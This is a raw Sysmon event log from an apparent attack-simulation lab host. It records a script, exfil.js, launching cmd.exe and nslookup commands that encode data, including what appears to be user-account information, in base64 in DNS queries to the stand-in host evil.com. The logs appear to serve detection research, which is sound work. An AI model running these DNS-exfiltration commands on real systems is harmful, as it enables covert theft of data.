14:16:21.228{2E1864BB-17A1-629A-783D-000000005F02}55527744C:\Windows\System32\WScript.exe{2E1864BB-17B5-629A-463F-000000005F02}7000C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.231{2E1864BB-17B5-629A-463F-000000005F02}7000C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlswf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.212{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfoevj.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.174{2E1864BB-17B5-629A-443F-000000005F02}53807152C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-453F-000000005F02}1736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.158{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-453F-000000005F02}1736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.158{2E1864BB-17B5-629A-433F-000000005F02}62202056C:\Windows\system32\cmd.exe{2E1864BB-17B5-629A-453F-000000005F02}1736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.171{2E1864BB-17B5-629A-453F-000000005F02}1736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B5-629A-433F-000000005F02}6220C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfoevj.tmp 2>&1 10341000x8000000000000000197530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.127{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-443F-000000005F02}5380C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.127{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B5-629A-443F-000000005F02}5380C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.109{2E1864BB-17B5-629A-443F-000000005F02}53807152C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-433F-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.089{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-443F-000000005F02}5380C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.074{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.074{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.074{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.074{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.074{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-433F-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.074{2E1864BB-17A1-629A-783D-000000005F02}55527144C:\Windows\System32\WScript.exe{2E1864BB-17B5-629A-433F-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.080{2E1864BB-17B5-629A-433F-000000005F02}6220C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfoevj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.058{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlymznl.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000197518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.209{00000000-0000-0000-0000-000000000000}7488<unknown process>-udptruefalse127.0.0.1-52408-false127.0.0.1-53domain 10341000x8000000000000000197517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.027{2E1864BB-17B4-629A-413F-000000005F02}64484040C:\Windows\system32\conhost.exe{2E1864BB-17B5-629A-423F-000000005F02}7536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.027{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.027{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.027{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.027{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.027{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B5-629A-423F-000000005F02}7536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.027{2E1864BB-17B4-629A-403F-000000005F02}73965420C:\Windows\system32\cmd.exe{2E1864BB-17B5-629A-423F-000000005F02}7536C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:21.033{2E1864BB-17B5-629A-423F-000000005F02}7536C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B4-629A-403F-000000005F02}7396C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlymznl.tmp 2>&1 10341000x8000000000000000197509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 